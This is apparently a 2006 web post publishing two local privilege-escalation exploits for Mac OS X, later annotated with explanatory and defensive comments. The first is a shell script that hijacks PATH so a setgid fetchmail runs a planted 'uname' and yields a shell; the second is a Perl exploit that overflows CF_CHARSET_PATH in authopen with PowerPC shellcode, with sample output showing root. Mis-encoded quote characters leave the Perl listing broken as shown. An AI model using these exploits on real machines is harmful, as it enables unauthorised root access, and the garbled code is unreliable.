
OSX: local fetchmail exploit

Posted by deepquest on August 5, 2006 – 3:25 am

local fetchmail exploit v1 and v2

#!/bin/sh
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# What the four commands below do, as written: prepend /tmp to PATH, drop a
# file named "uname" there whose only content is the text "/bin/sh -i",
# mark it executable, and ask fetchmail for its version banner.  The
# author's premise -- not visible in this script -- is that a setgid
# fetchmail resolves "uname" through the inherited PATH, so the /tmp copy
# is found first.  Defensive reading: a privileged program must not trust
# an inherited PATH (reset it, or call helpers by absolute path), and the
# observable artefacts are a world-writable directory placed ahead of the
# system directories in PATH plus a new executable in /tmp named after a
# system utility.
#
# "setgid=6" is the author's claim; gid 6 is conventionally the "mail"
# group on BSD-derived systems -- presumably what is meant, confirm against
# the affected system's /etc/group.

export PATH=/tmp:$PATH
# A shebang-less one-line file: its content is the literal string written
# by echo, nothing else.
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
# The trigger: fetchmail is only asked to print its version.
/usr/bin/fetchmail -V

v2:

#!/usr/bin/perl
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#
# NOTE(review): the quote characters throughout this listing (the
# "β€œ" / "”" / "β€˜" / "’" sequences) are mis-encoded typographic quotes
# from the web page; the original source presumably used plain ASCII
# quotes.  As shown, the listing would not parse.
#
# Structure, as visible below: empty the environment, define a byte string
# the author describes as PowerPC machine code, print a target table when
# no argument is given, then set two environment variables and run
# /usr/libexec/authopen.  The author's comments are the only description
# of the underlying flaw; nothing here verifies it.  Defensive reading: the
# flaw relied on is a privileged program trusting the length of an
# inherited environment variable (CF_CHARSET_PATH), which is why setuid
# helpers should drop or sanitise their environment before use.

# Start from an empty environment so that only the two variables assigned
# further down are present when authopen runs.
foreach $key (keys %ENV) {

delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
# Opaque machine-code bytes; the line above is the author's description
# and is not verified here.  The trailing "/bin/shX" (bytes 2f 62 69 6e 2f
# 73 68 58 on the last line) is the only human-readable part.
$sc =
β€œ\x7c\x63\x1a\x79” .
β€œ\x40\x82\xff\xfd” .
β€œ\x39\x40\x01\xc3” .
β€œ\x38\x0a\xfe\xf4” .
β€œ\x44\xff\xff\x02” .
β€œ\x39\x40\x01\x23” .
β€œ\x38\x0a\xfe\xf4” .
β€œ\x44\xff\xff\x02” .
β€œ\x60\x60\x60\x60” .
β€œ\x7c\xa5\x2a\x79” .
β€œ\x40\x82\xff\xfd” .
β€œ\x7d\x68\x02\xa6” .
β€œ\x3b\xeb\x01\x70” .
β€œ\x39\x40\x01\x70\x39\x1f\xfe\xcf” .
β€œ\x7c\xa8\x29\xae\x38\x7f\xfe\xc8” .
β€œ\x90\x61\xff\xf8\x90\xa1\xff\xfc” .
β€œ\x38\x81\xff\xf8\x38\x0a\xfe\xcb” .
β€œ\x44\xff\xff\x02\x7c\xa3\x2b\x78” .
β€œ\x38\x0a\xfe\x91\x44\xff\xff\x02” .
β€œ\x2f\x62\x69\x6e\x2f\x73\x68\x58”;

# Target table: key => "description:padding".  The number after the colon
# becomes $b below.
$tgts{β€œ0”} = β€œ10.3.7 Build 7T65 on PowerPC:1”;
$tgts{β€œ1”} = β€œ10.3.7 debug 0x41424344:0”;

# No argument: print usage plus the target list and exit 1.  The usage
# text most likely lost an angle-bracketed placeholder after $0 to the
# page's HTML rendering.
unless (($target) = @ARGV) {

print β€œ\n\nUsage: $0 \n\nTargets:\n\n”;

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{β€œ$key”});
# The " . " is inside the string, so each line prints as "0 . <desc>"
# rather than concatenating $key and $a.
print β€œ\t$key . $a\n”;
}

print β€œ\n”;
exit 1;
}

# $retval is never assigned anywhere in this listing and $ret is never
# read, so this line is dead -- presumably a leftover from the exploit
# this was adapted from.
$ret = pack(β€œl”, ($retval));
# No validation of $target: an unknown key yields undef here and an empty
# $b below.
($a,$b) = split(/\:/,$tgts{β€œ$target”});
print β€œ*** Target: $a, Padding: $b\n”;

# add a wrapper here if you want more than euid=0
# Writes a one-line csh script to /tmp/sh.  The handle is never closed
# explicitly; it is flushed when the interpreter exits.
open(SUSH,”>/tmp/sh”);
printf SUSH β€œ/bin/csh -i\n”;

# 1048 filler bytes followed by one native-endian 32-bit value packed
# twice; this is the over-long value the author's title refers to.
$ENV{β€œCF_CHARSET_PATH”} = β€œA” x 1048 . pack(β€˜l’, 0xbffffef6) x 2;

# $b dots of padding (from the target table), 40 repetitions of "iiii",
# then the byte string defined above.
$ENV{β€œAPPL”} = β€œ.” x $b . β€œiiii” x 40 . $sc ;

# Runs the privileged helper with only the two variables above in its
# environment.
system(β€œ/usr/libexec/authopen /etc/master.passwd”);

